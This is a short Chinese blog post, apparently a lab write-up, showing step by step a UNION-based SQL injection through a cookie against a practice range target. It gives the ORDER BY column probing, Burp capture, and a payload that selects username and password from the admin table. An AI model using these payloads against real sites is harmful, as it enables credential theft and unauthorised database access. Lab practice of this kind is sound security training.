前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >SQL注入实战(二)

SQL注入实战(二)

作者头像
木尤
发布2020-07-14 15:29:02
4270
发布2020-07-14 15:29:02
举报
文章被收录于专栏:我的csdn我的csdn

封神台靶场

https://hack.zkaq.cn/battle/target?id=31ac789a52edf9bb

1.打开网站,打开一篇新闻

http://59.63.200.79:8004/shownews.asp?id=171

2.看下能不能用带参数注入,在后面加个单引号,网页提示传参错误
3.现在试试有几个字段

测试后发现 http://59.63.200.79:8004/shownews.asp?id=171 order by 10 order by 10页面显示正常,但是当用orderby11时显示数据库错误

4.先试试burp抓包

抓包发现存在cookice 用modheader

5.试试提交cookice

id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin 所有的字段显示出来,说明存在admin

6.接着在cookice里面设置

id=171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin

本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2020-07-10 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 封神台靶场
    • 1.打开网站,打开一篇新闻
      • 2.看下能不能用带参数注入,在后面加个单引号,网页提示传参错误
        • 3.现在试试有几个字段
          • 4.先试试burp抓包
            • 5.试试提交cookice
              • 6.接着在cookice里面设置
              领券
              问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档